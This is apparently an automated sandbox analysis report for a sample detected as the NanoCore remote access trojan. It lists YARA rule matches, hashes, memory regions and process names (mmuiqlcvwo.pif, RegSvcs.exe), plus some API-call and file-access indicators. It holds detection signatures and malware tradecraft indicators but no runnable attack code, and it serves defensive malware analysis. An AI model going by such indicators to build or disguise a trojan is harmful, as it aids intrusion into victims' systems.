        Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegSvcs.exe.60f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.60f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegSvcs.exe.3834f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.3834f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_008633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,8_2_008633A3
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: String function: 00846B90 appears 39 times
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: String function: 008759E6 appears 65 times
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: String function: 008414F7 appears 36 times
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: String function: 001AD940 appears 51 times
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: String function: 001AE2F0 appears 31 times
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: String function: 001AD870 appears 35 times
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_00196FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00196FC6
        Source: YdACOWCggQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeFile created: C:\Users\user\33920049Jump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@10/36@23/2
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeFile read: C:\Windows\win.iniJump to behavior
